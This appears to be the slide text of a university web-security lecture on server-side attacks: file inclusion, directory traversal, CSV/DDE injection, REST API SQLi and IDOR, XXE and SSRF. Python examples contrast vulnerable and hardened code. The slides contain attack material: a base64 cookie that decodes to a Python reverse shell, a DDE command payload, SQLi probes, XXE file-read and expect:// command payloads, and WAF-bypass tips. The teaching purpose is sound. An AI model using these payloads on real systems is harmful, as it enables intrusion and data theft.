A little more of Server Side Attacks
COMP6443 – Topic 3

A NOTE ON ETHICS / LEGALITY
UNSW hosting this course is an extremely important step forward.
We expect a high standard of professionalism from you, meaning:
Respect the property of others and the university
Always abide by the law and university regulations
Be considerate of others to ensure everyone has an equal learning experience
Always check that you have written permission before performing a security test on a system

SERVER-SIDE ~MAGIC~
Server Side Include
CSV Injection
REST API related vulnerabilities
XML related vulnerabilities
SSRF

This session will be demo-heavy – you’re all welcome to have a play, but *don’t* do anything which locks me or the other students out. The open environment *ends* if we break it.

SERVER-SIDE INCLUDE
main.php?p=shop   (includes shop.php)
  login.php
  admin.php
  shop.php   <- included
  info.php

main.php?p=admin   (includes admin.php)
  login.php
  admin.php   <- included
  shop.php
  info.php

The parameter names the file to include, so anything else you can name on disk gets included too (this is PHP include() with user input, i.e. local file inclusion, not Apache's SSI directives).
What other languages are vulnerable to this?
What about templating engines? AngularJS?

SERVER-SIDE INCLUDE
Step 1: Brute force the location of the Apache HTTP Error Log
Step 2: Poison /var/log/httpd/error.log with

Step 3: ???
Step 4: Why yes, my cookie is indeed
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEyMzQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycKCg==
(decoded, that is a one-line python reverse shell: connect to 10.0.0.1:1234, dup the socket over stdin/stdout/stderr, then spawn /bin/sh -i)

SERVER-SIDE INCLUDE VARIANTS?
A:\
http://
gopher:// (and other non-HTTP)
\\blah\ (UNC path)
Localhost (other local names)
::1 (ipv6)
Local web services?

What ways can you refer to a file?
What OS are you on?
Do symlinks work? Alternate data streams? Can you upload an ADS?

What else?
/proc
/dev/tcp/blah/blah
ADMIN$ (and the other Windows administrative shares)

DIRECTORY TRAVERSAL
1.php?uid=abcd&rec=2              (reads a record under abcd/)
1.php?uid=abcd/..&rec=3.php%00    (walks back out of abcd/, and the %00 truncates whatever suffix the script appends)
  2.txt
  3.txt
  abcd
  4.txt
  2.php
  3.php
Affects: All languages (functionality which loads data from a file, which talks about
Doable in Python / Ruby / ASP.NET but rare.
Frameworks can make your code *more* vulnerable to this (by implementing an equivalent of include()).
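To make the two bugs above concrete, here is a small model of the include() and record-loading code paths (main.php?p=... and 1.php?uid=...&rec=...), each next to the check that closes it. This is an added example, not code from the course: the web root, the page allowlist and the parameter shapes are assumptions.

```python
"""
Models the include() and record-loading bugs on the two slides above
(main.php?p=... and 1.php?uid=...&rec=...) and the checks that close them.
Added example, not code from the course: the web root, the allowlist and the
parameter shapes are assumptions.
"""
import posixpath
import re

WEBROOT = "/var/www/app"                      # assumed document root
PAGES = {"login", "admin", "shop", "info"}    # the files main.php is meant to include


def c_string(s: str) -> str:
    """Emulate a C-level open(): the kernel stops reading the path at the first NUL.
    This is what the %00 trick relied on (old PHP passed the NUL through; 5.3.4 rejects it)."""
    return s.split("\0", 1)[0]


def vulnerable_include(p: str) -> str:
    """include($_GET['p'] . '.php') with no validation: p may carry '/', '..' or NUL."""
    return posixpath.normpath(c_string(posixpath.join(WEBROOT, p + ".php")))


def vulnerable_record(uid: str, rec: str) -> str:
    """fopen("$root/$uid/$rec.txt"): the slide's uid=abcd/..&rec=3.php%00 lands on 3.php."""
    return posixpath.normpath(c_string(posixpath.join(WEBROOT, uid, rec + ".txt")))


def safe_include(p: str) -> str:
    """Allowlist: the parameter picks a name from a fixed set, never a path."""
    if p not in PAGES:
        raise ValueError("unknown page")
    return posixpath.join(WEBROOT, p + ".php")


def safe_record(uid: str, rec: str) -> str:
    """Two independent checks: the value shape first (no '/', '.' or NUL can pass
    the regex), then the resolved path is confirmed to still sit under WEBROOT."""
    if not re.fullmatch(r"[A-Za-z0-9]{1,32}", uid):
        raise ValueError("bad uid")
    if not re.fullmatch(r"[0-9]{1,6}", rec):
        raise ValueError("bad rec")
    path = posixpath.normpath(posixpath.join(WEBROOT, uid, rec + ".txt"))
    if posixpath.commonpath([WEBROOT, path]) != WEBROOT:
        raise ValueError("path escapes web root")
    return path


def rejected(fn, *args) -> bool:
    """True if the hardened function refuses the input."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_include("../../../etc/passwd\0"))   # /etc/passwd
    print(vulnerable_record("abcd/..", "3.php\0"))        # /var/www/app/3.php
    print(safe_include("shop"))                           # /var/www/app/shop.php
```

The allowlist is the real fix; the regex-plus-commonpath check is what you fall back to when the set of files genuinely is dynamic. On the PHP side, `allow_url_include=Off` and `open_basedir` limit the blast radius of anything that slips through, but neither replaces validating the parameter.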

Credits: kranko235

What is CSV?
Comma-Separated-Values
File extension: .csv
Flat files, defined for data only.

What data can we put in the file?

CSV Formula Injection
Cells beginning with = are interpreted as formulas by Excel (and other applications).

Formulas that hurt!
So why is this dangerous?

Formulas can be used for multiple kinds of malicious payloads, for example:
Create fake hyperlinks.
Use Excel DDE (Dynamic Data Exchange) to execute commands (Excel only).

=cmd|' /C notepad'!'A1'

What happens next?

and….

Remediations
Application exporting CSV files must sanitise the output!
The following leading characters are known to be dangerous:
= + - @
Cells beginning with these characters should have a single quote character (') inserted at the beginning.
This forces Excel to interpret the cell as text.
Make sure commas are removed from data (or that every field is quoted)!
An unquoted comma starts a new cell, and that new cell evades the single quote remediation above.
If a delimiter other than commas is used, modify the remediation accordingly.

Webservices and API Security
All types of injection attacks
Broken function & object level authorisation
Excessive data exposure
Rate-limiting
Restricting insecure usage of HTTP methods
Leaking tokens (via caching, logs etc.)
Mass assignment
Security misconfiguration

https://github.com/srini0x00/securestore_restapis

SQLI IN REST APIS?
http://application/apiv3/Users/?req_id=1' AND '1' LIKE '1

http://application/apiv3/Users/?req_id=1' AND '1' LIKE '2

Generally APIs (especially APIs backing mobile apps) have little, if any, protection against SQLi; if the two requests above behave differently, the quote broke out of the string. These are great targets for testing for SQLi.

Credits: https://pranavhivarekar.in/2015/06/21/dropboxs-critical-bug-app-having-only-access-to–app-folder–being-able-to-post-and-enumerate-files-inof-any-folder/
Broken function & object level authorisation

Insecure Direct Object Reference(IDOR)
https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/

A vulnerability attackers generally find because the access controls for a specific function or object are not defined properly in the application. It gives:
Read access/Data Exfiltration
Editing records
Privilege escalation
Account takeover.

Some other takeaways
Using INT vs UUIDs
POST vs GET
Cache headers
User access map
Permissions libraries
Edge cases
Not too many nested ifs
Look at the code logic when you are refactoring
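The SQLi probe from the /apiv3/Users/?req_id= slide and the IDOR above share a cause (the handler trusts the request) and a fix (parameterised query plus an ownership predicate), so one example covers both. This is an added example backed by an in-memory SQLite table, not the course's code; the table, the rows and the owner column are made up.

```python
"""
A GET /apiv3/Users/?req_id=... handler in two versions, backed by an in-memory
SQLite table: the boolean-based SQLi probe from the slide, and the IDOR that
an ownership check closes. Added example, not the course's code.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (req_id TEXT, owner TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1", "alice", "alice@example.test"),   # constructed rows
        ("2", "bob", "bob@example.test"),
    ])
    return db


def vulnerable_lookup(db, caller: str, req_id: str) -> list:
    """Both bugs at once: the value is pasted into the SQL string (SQLi) and the
    caller is ignored, so any authenticated user can read any req_id (IDOR)."""
    sql = "SELECT email FROM users WHERE req_id = '" + req_id + "' ORDER BY req_id"
    return [row[0] for row in db.execute(sql)]


def hardened_lookup(db, caller: str, req_id: str) -> list:
    """Parameterised query scoped to the caller: the value can never change the
    query's structure, and the ownership predicate is part of the same query,
    so there is no window where an unowned row is fetched and filtered later."""
    if not req_id.isdigit():           # the API documents req_id as an integer
        return []
    rows = db.execute(
        "SELECT email FROM users WHERE req_id = ? AND owner = ? ORDER BY req_id",
        (req_id, caller),
    )
    return [row[0] for row in rows]


def looks_injectable(lookup, db) -> bool:
    """The probe from the slide: a TRUE and a FALSE condition should behave the
    same on a safe endpoint; different answers mean the quote broke out."""
    true_case = lookup(db, "alice", "1' AND '1' LIKE '1")
    false_case = lookup(db, "alice", "1' AND '1' LIKE '2")
    return true_case != false_case


if __name__ == "__main__":
    db = build_db()
    print(looks_injectable(vulnerable_lookup, db))   # True
    print(looks_injectable(hardened_lookup, db))     # False
    print(vulnerable_lookup(db, "bob", "1"))         # bob reads alice's record
    print(hardened_lookup(db, "bob", "1"))           # []
```

Note what UUIDs from the takeaway list do and do not buy you: an unguessable req_id slows enumeration, but the ownership predicate is still the only thing that stops a user who has obtained someone else's identifier.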

XML 101
Way to serialize data in a way that is both human and machine readable
Was the standard before JSON for client-server data exchange


(sample XML document; its element tags did not survive extraction)
Hacker
123 fake st
0412345678

The server reads it as:
Username: Hacker
Address: 123 fake st
Number: 0412345678

EXTERNAL XML ENTITY ATTACKS
XML can declare external entities: references the parser resolves for you, to local files, URLs or (with the right stream wrapper) even commands.
]>   (only the closing bracket of the slide's DOCTYPE/ENTITY declaration survived extraction)

XXE
The parser often has permission to read any file the web server user can read
We exploit this by asking the parser to include a local file, a form of LFI (Local File Inclusion)
Consider a login request to a server made with XML


    Joe Smith
    1234

Request
Incorrect Password for Joe Smith
Response

XXE


]>

    &xxe;
    mypass

Request
Incorrect Password for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

Response
We can send our request with a system resource request in it

XXE VARIANTS
]>&xxe;
]>&xxe;
]>&xxe;
]> (rare)

What else?

XXE – CODE EXEC (PHP)
$stream = fopen("expect://ls", "r");
PHP (the absolute legend) has a PECL extension called Expect that exposes an expect:// stream wrapper, letting you run a command as if it were a file.

If it is installed, XXE therefore gets you code execution.


]>

    &xxe;
    mypass

Incorrect password for
root
bin
etc
var
adult_files

XXE Demo

XXE – JUST THE SURFACE
There are many ways to exploit an XML parser and get around defences
You can use DTDs and parameter entities to get past filters and nest payloads
You can make the parser send HTTP requests to your own server to exfiltrate data (blind / out-of-band XXE)
Etc.
tl;dr:
Disable external entity processing
Don't use PHP
Don't use XML
Most JSON parsing libraries are more secure*
* https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
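The file-disclosure XXE from the login example earlier and the "disable external entity processing" fix from the tl;dr, in one runnable piece. This is an added example, not the course's code: Python's xml.sax stands in for PHP's libxml, and the element names, the handler and the stand-in secret file are constructed here.

```python
"""
The XML login handler from the XXE slides, parsed with and without external
entity expansion. Added example, not the course's code: the element names,
the handler and the stand-in secret file are constructed here.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class LoginHandler(ContentHandler):
    """Collects the text of <username> and <password>."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name in ("username", "password"):
            self._current = name
            self.fields[name] = ""

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        if name == self._current:
            self._current = None


def parse_login(xml_bytes: bytes, expand_external_entities: bool) -> dict:
    """expand_external_entities=True is the vulnerable configuration (Python's own
    default before 3.7.1); False is the 'disable external entity processing' fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, expand_external_entities)
    handler = LoginHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.fields


def login_response(xml_bytes: bytes, expand_external_entities: bool) -> str:
    """The error message reflects the username, which is what leaks the file."""
    fields = parse_login(xml_bytes, expand_external_entities)
    return "Incorrect password for " + fields.get("username", "")


def xxe_payload(target_path: str) -> bytes:
    """The slide's request with the entity pointing at target_path."""
    return f"""<?xml version="1.0"?>
<!DOCTYPE login [
  <!ENTITY xxe SYSTEM "file://{target_path}">
]>
<login>
  <username>&xxe;</username>
  <password>mypass</password>
</login>""".encode()


def demo() -> tuple:
    """Write a stand-in for /etc/passwd, then send the payload to both configurations."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed file content
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = login_response(payload, expand_external_entities=True)
        safe = login_response(payload, expand_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print(leaked)   # the file contents come back in the error message
    print(safe)     # the entity is simply not expanded
```

With the feature off the parser still accepts the DOCTYPE, it just refuses to fetch the entity; the stricter option is to reject any document that carries a DOCTYPE at all, which is what defusedxml does. On the PHP side the equivalent switch was libxml_disable_entity_loader(true) (unnecessary since PHP 8.0, where the loader is off by default).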

XXE – RELEVANT

Parser Exploits are very relevant


The internet moves rapidly and a lot of it still runs on XML
Furthermore developers forget to take things out and manage old code
If you prod around any site you will most likely find things you shouldn’t (be ethical tho)

Server-Side Request Forgery

SSRF – Attacker’s point of view
Tricking the web application into making requests to internal systems on behalf of the attacker.
Typically works on URL-based input from users, e.g. an "import image from URL" function.
Other URL schemes may work too, e.g. file://, phar://, gopher://, data:// and dict://
You can:
Enumerate internal/external services.
Exfiltrate data.
Abuse API calls.
Invoke Cloud Services APIs.

What is URI?
Uniform Resource Identifier defined in RFC-3986.
Used to specify a resource.
Example:

URL Parsing (Null Char)

Vulnerabilities in libs

SSRF – Demo

SSRF – Defense
Whitelisting domains.
Disable access to internal domains – Firewall/Network policies.
Network level restrictions.
Be aware that URL parsing is hard and easily bypassed (alternate IP encodings, redirects, DNS rebinding), so never use it as the only defence.
Block access to cloud metadata services (eg: 169.254.169.254 for AWS)
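The URL-level part of that defence, as an added example (not the course's code), covering the bypass shapes from the SSRF slides: other schemes, loopback, IPv6 and IPv4-mapped forms, the 169.254.169.254 metadata address, a hostname that resolves to it, a NUL in the URL, and the decimal-IP trick. The DNS answers, hostnames and allowed ports are constructed assumptions so it runs offline.

```python
"""
URL vetting for an 'import image from URL' feature. Added example, not the
course's code: the DNS answers, hostnames and allowed ports are assumptions.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

FAKE_DNS = {  # constructed answers so the example runs offline
    "images.example": {"8.8.8.8"},
    "rebind.example": {"8.8.8.8", "127.0.0.1"},      # one public, one loopback answer
    "metadata.example": {"169.254.169.254"},          # points at the AWS metadata address
    "2130706433": {"127.0.0.1"},                      # libc's inet_aton accepts decimal IPs
}


def resolve_all(host: str) -> set:
    """Production resolver: every A/AAAA answer for host (needs network)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def fake_resolver(host: str) -> set:
    if host not in FAKE_DNS:
        raise ValueError("NXDOMAIN " + host)
    return FAKE_DNS[host]


def is_internal(ip: str) -> bool:
    """Anything that is not a public unicast address: loopback, RFC 1918/ULA,
    link-local (169.254.169.254 lives here), multicast, reserved, unspecified.
    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped first."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (not addr.is_global or addr.is_private or addr.is_loopback
            or addr.is_link_local or addr.is_multicast or addr.is_reserved
            or addr.is_unspecified)


def check_fetch_url(url: str, resolver=resolve_all) -> str:
    """Return url if it may be fetched, else raise ValueError.

    The verdict is only valid at the instant it was computed: the fetch itself
    must connect to the vetted IP (or repeat this check on every redirect),
    otherwise DNS rebinding turns the check into a TOCTOU bypass."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        raise ValueError("control character (NUL, CR, LF...) in URL")
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:          # no file:, gopher:, dict:, phar:, data:
        raise ValueError("scheme not allowed: " + repr(parts.scheme))
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo not allowed")   # http://images.example@127.0.0.1/
    host = parts.hostname
    if not host:
        raise ValueError("no host")
    port = parts.port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError("port not allowed: %d" % port)
    try:
        answers = {str(ipaddress.ip_address(host))}   # IP literal, including [::1] forms
    except ValueError:
        answers = resolver(host)                       # otherwise ask DNS
    for ip in answers:                                 # reject if ANY answer is internal
        if is_internal(ip):
            raise ValueError("%s resolves to internal address %s" % (host, ip))
    return url


def rejected(url: str, resolver=resolve_all) -> bool:
    try:
        check_fetch_url(url, resolver)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for u in ("https://images.example/cat.png", "http://metadata.example/", "http://[::1]/"):
        print(u, "rejected" if rejected(u, fake_resolver) else "ok")
```

This is the application-layer half only: the egress firewall rules and the metadata-service block from the slide still have to exist underneath it, because any parser disagreement between this code and the HTTP client that does the fetch is a bypass.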

TL;DR: WAFS (ESP. APPLIANCES)

WAFs are good at:

Probing payloads
OR 1=1, OR 1=0
Known exploits
Known frameworks
Malware scanning
Handing out IP bans

WAFs are not good at:

Custom payloads
SCript, scrIPt
Execution time trickery
OR 2=2
Anything logic-related

FINGERPRINTING WAFS
Find out what WAF is running, and look into whether there are any publicly known bypasses for it.

bonus points, there may be exploits in the WAF itself

RUNTIME APPLICATION SELF PROTECTION
A WAF IN API HOOK FORM

Do the right thing. Scamming executives is unethical.

READING MATERIAL (REFERENCE)
XXE further details and fundamentals

Pentester Lab: XXE
https://pentesterlab.com/exercises/play_xxe/course
Twitter XXE Writeup
https://hackerone.com/reports/248668

questions? slack / email / come talk to us
THANKS FOR LISTENING TO US RANT!